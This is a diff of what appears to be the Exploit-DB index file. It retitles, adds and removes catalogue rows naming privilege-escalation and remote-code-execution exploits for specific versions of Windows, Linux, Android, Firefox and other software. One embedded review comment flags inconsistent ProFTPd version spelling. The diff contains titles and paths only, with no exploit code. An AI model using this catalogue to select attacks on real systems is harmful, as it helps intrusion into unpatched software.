 27296,platforms/windows/local/27296.rb,"Microsoft Windows - HWND_BROADCAST Low to Medium Integrity Privilege Escalation (MS13-005) (Metasploit)",2013-08-02,Metasploit,windows,local,0
 27297,platforms/linux/local/27297.c,"Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation",2013-08-02,spender,linux,local,0
 27316,platforms/windows/local/27316.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow (SEH)",2013-08-03,sagi-,windows,local,0
-27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
+27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - 'additional_parameters' Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
 40764,platforms/windows/local/40764.cs,"Microsoft Windows - VHDMP ZwDeleteFile Arbitrary File Deletion Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
 40763,platforms/windows/local/40763.cs,"Microsoft Windows - VHDMP Arbitrary File Creation Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
@@ -8224,6 +8224,7 @@ id,file,description,date,author,platform,type,port
 40522,platforms/windows/local/40522.txt,"InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
 30464,platforms/linux/local/30464.c,"Generic Software Wrappers Toolkit 1.6.3 (GSWTK) - Race Condition Privilege Escalation",2007-08-09,"Robert N. M. Watson",linux,local,0
 30468,platforms/windows/local/30468.pl,"RealNetworks RealPlayer 16.0.3.51/16.0.2.32 - '.rmp' Version Attribute Buffer Overflow",2013-12-24,"Gabor Seljan",windows,local,0
+30474,platforms/multiple/local/30474.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0
 30477,platforms/windows/local/30477.txt,"Huawei Technologies du Mobile Broadband 16.0 - Privilege Escalation",2013-12-24,LiquidWorm,windows,local,0
 30484,platforms/bsd/local/30484.c,"Systrace - Multiple System Call Wrappers Concurrency Vulnerabilities",2007-08-09,"Robert N. M. Watson",bsd,local,0
 30503,platforms/linux/local/30503.txt,"BlueCat Networks Adonis 5.0.2.8 - CLI Privilege Escalation",2007-08-16,forloop,linux,local,0
@@ -8302,7 +8303,7 @@ id,file,description,date,author,platform,type,port
 32848,platforms/linux/local/32848.txt,"Sun xVM VirtualBox 2.0/2.1 - Privilege Escalation",2009-03-10,"Sun Microsystems",linux,local,0
 32850,platforms/windows/local/32850.txt,"Multiple SlySoft Products - Driver IOCTL Request Multiple Local Buffer Overflow Vulnerabilities",2009-03-12,"Nikita Tarakanov",windows,local,0
 32884,platforms/android/local/32884.txt,"Adobe Reader for Android 11.1.3 - Arbitrary JavaScript Execution",2014-04-15,"Yorick Koster",android,local,0
-32891,platforms/windows/local/32891.txt,"Microsoft Windows Server 2003/2008/XP/Vista - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
+32891,platforms/windows/local/32891.txt,"Microsoft Windows XP/Vista/2003/2008 - WMI Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32892,platforms/windows/local/32892.txt,"Microsoft Windows XP/2003 - RPCSS Service Isolation Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32893,platforms/windows/local/32893.txt,"Microsoft Windows Vista/2008 - Thread Pool ACL Privilege Escalation",2009-04-14,"Cesar Cerrudo",windows,local,0
 32901,platforms/php/local/32901.php,"PHP 5.2.9 cURL - 'Safe_mode' and 'open_basedir' Restriction-Bypass",2009-04-10,"Maksymilian Arciemowicz",php,local,0
@@ -8335,7 +8336,7 @@ id,file,description,date,author,platform,type,port
 33623,platforms/linux/local/33623.txt,"Accellion Secure File Transfer Appliance - Multiple Command Restriction Weakness Privilege Escalation",2010-02-10,"Tim Brown",linux,local,0
 33725,platforms/aix/local/33725.txt,"IBM AIX 6.1.8 libodm - Arbitrary File Write",2014-06-12,Portcullis,aix,local,0
 40342,platforms/win_x86-64/local/40342.py,"TeamViewer 11.0.65452 (x64) - Local Credentials Disclosure",2016-09-07,"Alexander Korznikov",win_x86-64,local,0
-33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - addJavascriptInterface Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
+33791,platforms/arm/local/33791.rb,"Adobe Reader for Android - 'addJavascriptInterface' Exploit (Metasploit)",2014-06-17,Metasploit,arm,local,0
 33799,platforms/solaris/local/33799.sh,"Sun Connection Update Manager for Solaris - Multiple Insecure Temporary File Creation Vulnerabilities",2010-03-24,"Larry W. Cashdollar",solaris,local,0
 33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
 33824,platforms/linux/local/33824.c,"Linux Kernel 3.13 - (SGID) Privilege Escalation (PoC)",2014-06-21,"Vitaly Nikolenko",linux,local,0
@@ -8428,7 +8429,6 @@ id,file,description,date,author,platform,type,port
 35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0
 35983,platforms/windows/local/35983.rb,"Microsoft Remote Desktop Services - Web Proxy IE Sandbox Escape (MS15-004) (Metasploit)",2015-02-03,Metasploit,windows,local,0
 35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0
-35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0
 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation (MS14-070)",2015-01-29,KoreLogic,windows,local,0
 35953,platforms/windows/local/35953.c,"McAfee Data Loss Prevention Endpoint - Arbitrary Write Privilege Escalation",2015-01-30,"Parvez Anwar",windows,local,0
 35962,platforms/windows/local/35962.c,"Trend Micro Multiple Products 8.0.1133 - Privilege Escalation",2015-01-31,"Parvez Anwar",windows,local,0
@@ -8448,7 +8448,6 @@ id,file,description,date,author,platform,type,port
 36310,platforms/lin_x86-64/local/36310.txt,"Linux Kernel (x86-64) - Rowhammer Privilege Escalation (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0
 36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer - NaCl Sandbox Escape (PoC)",2015-03-09,"Google Security Research",lin_x86-64,local,0
 36327,platforms/windows/local/36327.txt,"Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation (MS10-073)",2011-11-22,instruder,windows,local,0
-36388,platforms/linux/local/36388.py,"Brasero CD/DVD Burner 3.4.1 - 'm3u' Buffer Overflow Crash (PoC)",2015-03-16,"Avinash Thapa",linux,local,0
 36390,platforms/windows/local/36390.txt,"Foxit Reader 7.0.6.1126 - Unquoted Service Path Elevation Of Privilege",2015-03-16,LiquidWorm,windows,local,0
 36417,platforms/windows/local/36417.txt,"Spybot Search & Destroy 1.6.2 Security Center Service - Privilege Escalation",2015-03-17,LiquidWorm,windows,local,0
 36424,platforms/windows/local/36424.txt,"Microsoft Windows 8.1 - Local WebDAV NTLM Reflection Elevation of Privilege",2015-03-19,"Google Security Research",windows,local,0
@@ -8475,7 +8474,6 @@ id,file,description,date,author,platform,type,port
 36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
 36827,platforms/windows/local/36827.py,"Free MP3 CD Ripper 2.6 2.8 - '.wav' SEH Based Buffer Overflow (Windows 7 DEP Bypass)",2015-04-24,naxxo,windows,local,0
 36837,platforms/windows/local/36837.rb,"Apple iTunes 10.6.1.7 - '.pls' Title Buffer Overflow",2015-04-27,"Fady Mohammed Osman",windows,local,0
-36841,platforms/windows/local/36841.py,"UniPDF 1.2 - 'xml' Buffer Overflow Crash (PoC)",2015-04-27,"Avinash Thapa",windows,local,0
 37065,platforms/windows/local/37065.txt,"Comodo GeekBuddy < 4.18.121 - Privilege Escalation",2015-05-20,"Jeremy Brown",windows,local,0
 36855,platforms/linux/local/36855.py,"Ninja Privilege Escalation Detection and Prevention System 0.1.3 - Race Condition Privilege Escalation",2015-04-29,"Ben Sheppard",linux,local,0
 36859,platforms/windows/local/36859.txt,"Foxit Reader PDF 7.1.3.320 - Parsing Memory Corruption",2015-04-29,"Francis Provencher",windows,local,0
@@ -8488,7 +8486,7 @@ id,file,description,date,author,platform,type,port
 36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0
 36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - Buffer Overflow",2015-05-11,evil_comrade,windows,local,0
 37049,platforms/windows/local/37049.txt,"Microsoft Windows - Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
-37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
+37052,platforms/windows/local/37052.c,"Microsoft Windows - 'CNG.SYS' Kernel Security Feature Bypass (PoC) (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
 37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
 37064,platforms/win_x86-64/local/37064.py,"Microsoft Windows 8.0/8.1 (x64) - 'TrackPopupMenu' Privilege Escalation (MS14-058)",2015-05-19,ryujin,win_x86-64,local,0
 37088,platforms/linux/local/37088.c,"Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation",2015-05-23,rebel,linux,local,0
@@ -8547,7 +8545,7 @@ id,file,description,date,author,platform,type,port
 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
-40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
+40975,platforms/android/local/40975.rb,"Google Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
@@ -8677,7 +8675,7 @@ id,file,description,date,author,platform,type,port
 39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
 39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
 39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
-39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
+39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
 39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
 39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
 39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
@@ -8691,7 +8689,7 @@ id,file,description,date,author,platform,type,port
 39791,platforms/multiple/local/39791.rb,"ImageMagick 6.9.3-9 / 7.0.1-0 - Delegate Arbitrary Command Execution (ImageTragick) (Metasploit)",2016-05-09,Metasploit,multiple,local,0
 39803,platforms/windows/local/39803.txt,"FileZilla FTP Client 3.17.0.0 - Unquoted Path Privilege Escalation",2016-05-11,"Cyril Vallicari",windows,local,0
 39804,platforms/windows/local/39804.txt,"Intuit QuickBooks Desktop 2007 < 2016 - Arbitrary Code Execution",2016-05-11,"Maxim Tomashevich",windows,local,0
-39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
+39809,platforms/windows/local/39809.cs,"Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
 39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
 39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
 39814,platforms/windows/local/39814.txt,"Multiples Nexon Games - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",windows,local,0
@@ -8880,15 +8878,12 @@ id,file,description,date,author,platform,type,port
 41605,platforms/windows/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,windows,local,0
 41607,platforms/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",windows,local,0
 41619,platforms/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,windows,local,0
-41675,platforms/android/local/41675.rb,"Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
-41681,platforms/multiple/local/41681.rb,"Adobe Flash Player - Nellymoser Audio Decoding Buffer Overflow (Metasploit) (2)",2015-06-23,Metasploit,multiple,local,0
-41682,platforms/multiple/local/41682.rb,"Mozilla Firefox 5.0 < 15.0.1 - __exposedProps__ XCS Code Execution (Metasploit)",2013-08-06,Metasploit,multiple,local,0
+41675,platforms/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,android,local,0
 41683,platforms/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,multiple,local,0
 41700,platforms/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,windows,local,0
 41701,platforms/windows/local/41701.rb,"Malwarebytes Anti-Malware < 2.0.3 / Anti-Exploit < 1.03.1.1220 - Update Remote Code Execution (Metasploit)",2014-12-16,Metasploit,windows,local,0
 41702,platforms/windows/local/41702.rb,"Microsoft Silverlight - ScriptObject Unsafe Memory Access (MS13-022/MS13-087) (Metasploit)",2013-03-12,Metasploit,windows,local,0
 41704,platforms/windows/local/41704.rb,"EMC Replication Manager < 5.3 - Command Execution 
(Metasploit)",2011-02-27,Metasploit,windows,local,0
-41705,platforms/windows/local/41705.rb,"MOXA MediaDBPlayback - ActiveX Control Buffer Overflow (Metasploit)",2010-10-19,Metasploit,windows,local,0
 41706,platforms/windows/local/41706.rb,"Microsoft Office - OLE Multiple DLL Side Loading Vulnerabilities (MS15-132/MS16-014/MS16-025/MS16-041/MS16-070) (Metasploit)",2015-12-08,Metasploit,windows,local,0
 41707,platforms/windows/local/41707.rb,"CA Arcserve D2D - GWT RPC Credential Information Disclosure (Metasploit)",2011-07-25,Metasploit,windows,local,0
 41708,platforms/windows/local/41708.rb,"Lenovo System Update - Privilege Escalation (Metasploit)",2015-04-12,Metasploit,windows,local,0
@@ -8896,7 +8891,6 @@ id,file,description,date,author,platform,type,port
 41710,platforms/windows/local/41710.rb,"HP Intelligent Management Center < 5.0 E0102 - UAM Buffer Overflow (Metasploit)",2012-08-29,Metasploit,windows,local,0
 41711,platforms/windows/local/41711.rb,"VMware Host Guest Client Redirector - DLL Side Loading (Metasploit)",2016-08-06,Metasploit,windows,local,0
 41712,platforms/windows/local/41712.rb,"CADA 3S CoDeSys Gateway Server - Directory Traversal (Metasploit)",2013-02-02,Metasploit,windows,local,0
-41713,platforms/windows/local/41713.rb,"MOXA Device Manager Tool 2.1 - Buffer Overflow (Metasploit)",2010-10-20,Metasploit,windows,local,0
 41721,platforms/win_x86-64/local/41721.c,"Forticlient 5.2.3 (Windows 10 x64 Pre Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41722,platforms/win_x86-64/local/41722.c,"Forticlient 5.2.3 (Windows 10 x64 Post Anniversary) - Privilege Escalation",2017-03-25,sickness,win_x86-64,local,0
 41745,platforms/hardware/local/41745.txt,"QNAP QTS < 4.2.4 - Domain Privilege Escalation",2017-03-27,"Pasquale Fiorillo",hardware,local,0
@@ -8978,7 +8972,7 @@ id,file,description,date,author,platform,type,port
 102,platforms/linux/remote/102.c,"Knox Arkeia Pro 5.1.12 - Backup Remote Code Execution",2003-09-20,anonymous,linux,remote,617
 103,platforms/windows/remote/103.c,"Microsoft Windows - 'RPC DCOM2' Remote Exploit (MS03-039)",2003-09-20,Flashsky,windows,remote,135
 105,platforms/bsd/remote/105.pl,"GNU CFEngine 2.-2.0.3 - Remote Stack Overflow",2003-09-27,kokanin,bsd,remote,5308
-107,platforms/linux/remote/107.c,"ProFTPd 1.2.9rc2 - ASCII File Remote Code Execution",2003-10-04,bkbll,linux,remote,21
+107,platforms/linux/remote/107.c,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (1)",2003-10-04,bkbll,linux,remote,21
 109,platforms/windows/remote/109.c,"Microsoft Windows - 'RPC2' Universal Exploit / Denial of Service (RPC3) (MS03-039)",2003-10-09,anonymous,windows,remote,135
 110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21
 112,platforms/windows/remote/112.c,"mIRC 6.1 - 'IRC' Protocol Remote Buffer Overflow",2003-10-21,blasty,windows,remote,0
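Review bot: Row 110 in this same hunk still spells the release as `1.2.9rc2` while the retitled row 107 (and row 3021 in the later hunk at @@ -9469) now use `1.2.9 rc2`, so the same ProFTPd version is written two ways in adjacent index rows and a plain-text search on either form will miss one of them. If the spaced form is the convention being introduced, row 110 should follow it in the same change: `110,platforms/linux/remote/110.c,"ProFTPd 1.2.7 < 1.2.9 rc2 - Remote Code Execution / Brute Force",2003-10-13,Haggis,linux,remote,21`. Whether other rows outside this hunk use the unspaced form cannot be seen from here.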
@@ -9263,11 +9257,11 @@ id,file,description,date,author,platform,type,port
 1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0
 1144,platforms/windows/remote/1144.html,"Microsoft Internet Explorer - 'blnmgr.dll' COM Object Remote Exploit (MS05-038)",2005-08-09,FrSIRT,windows,remote,0
 1146,platforms/windows/remote/1146.c,"Microsoft Windows - Plug-and-Play Service Remote Overflow (MS05-039)",2005-08-11,sl0ppy,windows,remote,139
-1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,anonymous,windows,remote,10000
+1147,platforms/windows/remote/1147.pm,"Veritas Backup Exec - Remote File Access Exploit (Windows) (Metasploit)",2005-08-11,Metasploit,windows,remote,10000
 1149,platforms/windows/remote/1149.c,"Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (MS05-039)",2005-08-12,houseofdabus,windows,remote,445
-1150,platforms/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,1761
-1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit) (1)",2005-08-12,anonymous,windows,remote,143
-1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,anonymous,windows,remote,8008
+1150,platforms/windows/remote/1150.pm,"Novell ZENworks 6.5 - Desktop/Server Management Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,1761
+1151,platforms/windows/remote/1151.pm,"MDaemon 8.0.3 - IMAPD CRAM-MD5 Authentication Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,143
+1152,platforms/windows/remote/1152.pm,"Novell eDirectory 8.7.3 - iMonitor Remote Stack Overflow (Metasploit)",2005-08-12,Metasploit,windows,remote,8008
 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete 
Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0
 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0
 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - '500-100.asp' Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0
@@ -9341,7 +9335,7 @@ id,file,description,date,author,platform,type,port
 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 (OSX) - location.QueryInterface() Code Execution (Metasploit)",2006-02-08,"H D Moore",osx,remote,0
 1486,platforms/linux/remote/1486.c,"Power Daemon 2.0.2 - (WHATIDO) Remote Format String",2006-02-10,"Gotfault Security",linux,remote,532
 1487,platforms/linux/remote/1487.c,"OpenVMPSd 1.3 - Remote Format String",2006-02-10,"Gotfault Security",linux,remote,1589
-1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
+1502,platforms/windows/remote/1502.py,"Microsoft Windows Media Player 7.1 < 10 - BMP Heap Overflow (PoC) (MS06-005) (2)",2006-02-16,redsand,windows,remote,0
 1504,platforms/windows/remote/1504.pm,"Microsoft Windows Media Player 9 - Plugin Overflow (MS06-006) (Metasploit)",2006-02-17,"H D Moore",windows,remote,0
 1505,platforms/windows/remote/1505.html,"Microsoft Windows Media Player 10 - Plugin Overflow (MS06-006)",2006-02-17,"Matthew Murphy",windows,remote,0
 1506,platforms/windows/remote/1506.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (2)",2006-02-17,darkeagle,windows,remote,0
@@ -9361,9 +9355,9 @@ id,file,description,date,author,platform,type,port
 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0
 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144
 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
-1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - client Log::ReallyPrint Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0
+1664,platforms/windows/remote/1664.py,"Ultr@VNC 1.0.1 - 'client Log::ReallyPrint' Buffer Overflow",2006-04-11,"Paul Haas",windows,remote,0
 1679,platforms/novell/remote/1679.pm,"Novell Messenger Server 2.0 - 'Accept-Language' Remote Overflow (Metasploit)",2006-04-15,"H D Moore",novell,remote,8300
-1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,anonymous,windows,remote,8080
+1681,platforms/windows/remote/1681.pm,"Sybase EAServer 5.2 - (WebConsole) Remote Stack Overflow (Metasploit)",2006-04-15,Metasploit,windows,remote,8080
 1703,platforms/windows/remote/1703.pl,"Symantec Scan Engine 5.0.x - Change Admin Password Remote Exploit",2006-04-21,"Marc Bevand",windows,remote,8004
 1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 - Long GET Request Remote Buffer Overflow",2006-04-25,c0d3r,linux,remote,0
 1739,platforms/osx/remote/1739.pl,"Darwin Streaming Server 4.1.2 - 'parse_xml.cgi' Code Execution",2003-02-24,FOX_MULDER,osx,remote,0
@@ -9449,8 +9443,8 @@ id,file,description,date,author,platform,type,port
 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (1)",2006-11-08,anonymous,windows,remote,0
 2749,platforms/windows/remote/2749.html,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (2)",2006-11-10,~Fyodor,windows,remote,0
 2753,platforms/windows/remote/2753.c,"Microsoft Internet Explorer 6/7 - (XML Core Services) Remote Code Execution (3)",2006-11-10,M03,windows,remote,0
-2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0
-2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit) (1)",2006-11-13,"H D Moore",windows,remote,0
+2770,platforms/windows/remote/2770.rb,"Broadcom Wireless Driver - Probe Response SSID Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
+2771,platforms/windows/remote/2771.rb,"D-Link DWL-G132 - Wireless Driver Beacon Rates Overflow (Metasploit)",2006-11-13,"H D Moore",windows,remote,0
 2784,platforms/multiple/remote/2784.html,"Links 1.00pre12 - (smbclient) Remote Code Execution",2006-11-14,"Teemu Salmela",multiple,remote,0
 2785,platforms/windows/remote/2785.c,"WinZip 10.0.7245 - (FileView ActiveX) Remote Buffer Overflow",2006-11-15,prdelka,windows,remote,0
 2789,platforms/windows/remote/2789.cpp,"Microsoft Windows - NetpManageIPCConnect Stack Overflow (MS06-070)",2006-11-16,cocoruder,windows,remote,0
@@ -9469,7 +9463,7 @@ id,file,description,date,author,platform,type,port
 2951,platforms/multiple/remote/2951.sql,"Oracle 9i / 10g (extproc) - Local / Remote Command Execution",2006-12-19,"Marco Ivaldi",multiple,remote,0
 2959,platforms/linux/remote/2959.sql,"Oracle 9i / 10g - File System Access via utl_file Exploit",2006-12-19,"Marco Ivaldi",linux,remote,0
 2974,platforms/windows/remote/2974.pl,"Http explorer Web Server 1.02 - Directory Traversal",2006-12-21,str0ke,windows,remote,0
-3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution",2003-10-15,"Solar Eclipse",linux,remote,21
+3021,platforms/linux/remote/3021.txt,"ProFTPd 1.2.9 rc2 - ASCII File Remote Code Execution (2)",2003-10-15,"Solar Eclipse",linux,remote,21
 3022,platforms/windows/remote/3022.txt,"Microsoft Windows - ASN.1 Remote Exploit (MS04-007)",2004-03-26,"Solar Eclipse",windows,remote,445
 3037,platforms/windows/remote/3037.php,"Durian Web Application Server 3.02 - Remote Buffer Overflow",2006-12-29,rgod,windows,remote,4002
 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
@@ -9592,7 +9586,7 @@ id,file,description,date,author,platform,type,port
 3880,platforms/windows/remote/3880.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0
 3881,platforms/windows/remote/3881.html,"Sienzo Digital Music Mentor 2.6.0.4 - SetEvalExpiryDate EIP Overwrite",2007-05-09,"Parveen Vashishtha",windows,remote,0
 3882,platforms/windows/remote/3882.html,"Barcodewiz ActiveX Control 2.52 - 'Barcodewiz.dll' Overwrite (SEH)",2007-05-09,"Parveen Vashishtha",windows,remote,0
-3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite PoC (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
+3892,platforms/windows/remote/3892.html,"Microsoft Internet Explorer 7 - Arbitrary File Rewrite (PoC) (MS07-027)",2007-05-10,"Andres Tarasco",windows,remote,0
 3893,platforms/windows/remote/3893.c,"McAfee Security Center IsOldAppInstalled - ActiveX Buffer Overflow",2007-05-10,Jambalaya,windows,remote,0
 3899,platforms/windows/remote/3899.html,"Morovia Barcode ActiveX Professional 3.3.1304 - Arbitrary File Overwrite",2007-05-11,shinnai,windows,remote,0
 3913,platforms/windows/remote/3913.c,"webdesproxy 0.0.1 - GET Request Remote Buffer Overflow",2007-05-12,vade79,windows,remote,8080
@@ -9696,7 +9690,7 @@ id,file,description,date,author,platform,type,port
 4348,platforms/windows/remote/4348.c,"PPStream - 'PowerPlayer.dll 2.0.1.3829' ActiveX Remote Overflow",2007-08-31,dummy,windows,remote,0
 4351,platforms/windows/remote/4351.html,"Yahoo! Messenger - 'YVerInfo.dll 2007.8.27.1' ActiveX Buffer Overflow",2007-09-01,minhbq,windows,remote,0
